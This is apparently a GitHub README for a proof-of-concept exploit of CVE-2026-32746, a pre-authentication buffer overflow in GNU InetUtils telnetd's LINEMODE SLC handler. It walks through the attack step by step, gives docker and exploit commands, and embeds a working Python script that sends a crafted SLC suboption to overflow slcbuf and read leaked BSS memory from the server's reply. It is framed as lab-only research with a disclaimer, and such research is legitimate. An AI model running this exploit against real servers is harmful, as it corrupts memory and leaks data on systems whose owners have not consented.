jeffaf/cve-2026-32746

CVE-2026-32746 - telnetd LINEMODE SLC Buffer Overflow

Pre-authentication buffer overflow in GNU InetUtils telnetd's LINEMODE SLC (Set Local Characters) handler.

CVSS 3.1: 9.8 (Critical) | CWE: CWE-120, CWE-787

Overview

The add_slc() function in telnetd/slc.c appends 3 bytes per SLC triplet to the fixed 108-byte slcbuf without any bounds check. An unauthenticated attacker can send a crafted SLC suboption containing 40 or more triplets whose function codes exceed NSLC (18) during option negotiation, before any login prompt is shown, overflowing the buffer and corrupting the slcptr pointer and adjacent data in BSS.

Affected

  • GNU InetUtils telnetd, all releases through 2.7
  • Any telnetd derived from the BSD SLC codebase
  • Patch expected by April 1, 2026

What This PoC Does

  • ✅ Triggers the buffer overflow and verifies it via SLC response analysis (leaked BSS data)
  • ❌ Does NOT achieve code execution (no shellcode/ROP chain)

Quick Start

# Build the vulnerable lab environment
docker compose up -d

# Detect (non-destructive)
python3 detect.py 127.0.0.1 2323

# Exploit (triggers overflow, verifies via response)
python3 exploit.py 127.0.0.1 2323

# Clean up
docker compose down

Lab Environment

The Docker setup runs a Debian container with inetutils-telnetd 2.4 under xinetd, exposed on port 2323. Fully isolated - nothing touches your host.

How It Works

  1. Connect to telnetd and complete initial option negotiation
  2. Client proactively sends WILL LINEMODE to trigger LINEMODE negotiation
  3. Server responds with DO LINEMODE and enters SLC suboption processing
  4. Client sends a crafted SLC suboption containing 40-60 triplets with function codes > 18 (NSLC)
  5. add_slc() queues a 3-byte "not supported" reply for each triplet into the fixed 108-byte slcbuf, of which 104 bytes remain once the 4-byte suboption header occupies the start of it
  6. After ~35 triplets, the buffer overflows, corrupting slcptr and adjacent BSS data
  7. end_slc() sends everything from slcbuf to the corrupted slcptr position, including leaked BSS memory in the response
  8. The server process remains alive; the overflow is confirmed by the oversized SLC response
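The exchange in steps 1 to 8, as an added example that is not the repository's exploit.py or detect.py: it builds the crafted LINEMODE SLC suboption, answers the server's option negotiation (refusing everything except LINEMODE, a simplification assumed here), and judges the SLC reply by whether slcbuf could physically have held it. Protocol constants are the RFC 854/1184 values; the buffer figures (108-byte slcbuf, 104 bytes left after the 4-byte header) are the ones stated in this README; all function names and the constructed test bytes are this example's own.

```python
"""Added example: LINEMODE SLC payload builder and reply analysis (not the repo's code)."""
import socket
import sys

IAC, SE, SB, WILL, WONT, DO, DONT = 255, 240, 250, 251, 252, 253, 254
TELOPT_LINEMODE = 34
LM_SLC = 3
SLC_VARIABLE = 2                        # level requested for each function
NSLC = 18                               # highest SLC function code telnetd knows
SLCBUF_SIZE = 108                       # fixed slcbuf size stated in the overview
SLC_HEADER = 4                          # IAC SB LINEMODE SLC fills the first 4 bytes
SLC_CAPACITY = SLCBUF_SIZE - SLC_HEADER # 104 bytes left for queued triplets (assumed split)


def iac_escape(data: bytes) -> bytes:
    """Double every 0xFF inside suboption data, as the telnet protocol requires."""
    return data.replace(b"\xff", b"\xff\xff")


def iac_unescape(data: bytes) -> bytes:
    return data.replace(b"\xff\xff", b"\xff")


def build_slc_suboption(n_triplets: int) -> bytes:
    """Step 4: IAC SB LINEMODE SLC (func level value)*n IAC SE with every func > NSLC."""
    body = bytearray()
    for i in range(n_triplets):
        func = NSLC + 1 + i % (254 - NSLC)           # 19..254, all "not supported"
        body += bytes([func, SLC_VARIABLE, 0])
    return bytes([IAC, SB, TELOPT_LINEMODE, LM_SLC]) + iac_escape(bytes(body)) + bytes([IAC, SE])


def answer_negotiation(data: bytes):
    """Steps 1-3: refuse every option except LINEMODE; report whether DO LINEMODE arrived.
    Deliberately naive: it scans the raw stream, suboption bodies included."""
    out, do_linemode, i = bytearray(), False, 0
    while i + 2 < len(data):
        if data[i] == IAC and data[i + 1] in (DO, WILL):
            cmd, opt = data[i + 1], data[i + 2]
            if cmd == DO and opt == TELOPT_LINEMODE:
                do_linemode = True
            elif cmd == DO:
                out += bytes([IAC, WONT, opt])
            else:
                out += bytes([IAC, DONT, opt])
            i += 3
        else:
            i += 1
    return bytes(out), do_linemode


def extract_slc_bodies(stream: bytes) -> list:
    """Unescaped body of every IAC SB LINEMODE SLC ... IAC SE suboption in stream."""
    marker = bytes([IAC, SB, TELOPT_LINEMODE, LM_SLC])
    bodies, pos = [], 0
    while (start := stream.find(marker, pos)) >= 0:
        start += len(marker)
        end = start
        while True:
            end = stream.find(bytes([IAC, SE]), end)
            if end < 0:
                return bodies                       # truncated suboption
            run = end
            while run > start and stream[run - 1] == IAC:
                run -= 1
            if (end - run) % 2 == 0:                # an odd IAC run ends the suboption
                break
            end += 1                                # even run: escaped 0xFF, SE is data
        bodies.append(iac_unescape(stream[start:end]))
        pos = end + 2
    return bodies


def analyze_reply(stream: bytes, n_sent: int) -> dict:
    """Step 8: a reply body longer than slcbuf's capacity cannot come from an intact buffer."""
    bodies = extract_slc_bodies(stream)
    if not bodies:
        return {"slc_reply": False, "overflow_suspected": False}
    body = max(bodies, key=len)                      # the overflowed reply is the largest
    return {
        "slc_reply": True,
        "body_len": len(body),
        "triplets": len(body) // 3,
        "expected_len": 3 * n_sent,                  # 3 bytes queued per unsupported triplet
        "overflow_suspected": len(body) > SLC_CAPACITY,
    }


def run_exchange(host: str, port: int, n_triplets: int, timeout: float = 3.0) -> bytes:
    """Drive steps 1-4 against a lab host and collect everything sent back afterwards."""
    reply, sent = b"", False
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(bytes([IAC, WILL, TELOPT_LINEMODE]))          # step 2
        for _ in range(20):                                     # bounded read loop
            try:
                chunk = s.recv(4096)
            except socket.timeout:
                break
            if not chunk:
                break
            answers, do_linemode = answer_negotiation(chunk)
            if answers:
                s.sendall(answers)
            if sent:
                reply += chunk
            elif do_linemode:                                   # step 3 -> step 4
                s.sendall(build_slc_suboption(n_triplets))
                sent = True
    return reply


if __name__ == "__main__":
    host, port = sys.argv[1], int(sys.argv[2])
    n = int(sys.argv[3]) if len(sys.argv) > 3 else 40
    print(analyze_reply(run_exchange(host, port, n), n))
```

Run it against the lab only: `python3 slc_check.py 127.0.0.1 2323 40`. The verdict rests on size alone, which is the same signal the README describes: a server whose slcbuf is intact can never emit more than 104 bytes of SLC body, so a larger reply means slcptr ran past the buffer. Leaked BSS bytes are not IAC-escaped by end_slc(), so a stray 0xFF in the leak can make the parser end the suboption early; the size check is then conservative, not wrong.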

Files

  • exploit.py: PoC overflow with response-based verification
  • Dockerfile: vulnerable telnetd lab
  • docker-compose.yml: one-command lab setup
  • xinetd-telnet.conf: xinetd service config
  • detect.py: non-destructive version detection script

Further Reading

For a deeper exploitation analysis, including byte constraints, alignment techniques, and the def_slcbuf/free() primitive on 32-bit systems, see watchTowr's writeup.

Disclaimer

This tool is provided for authorized security testing and educational purposes only. Do not use against systems you do not own or have explicit permission to test. The author is not responsible for misuse.

Credits

  • Vulnerability discovered by: Adiel Sol, Arad Inbar, Erez Cohen, Nir Somech, Ben Grinberg, Daniel Lubel (DREAM Security Research Team)

License

MIT
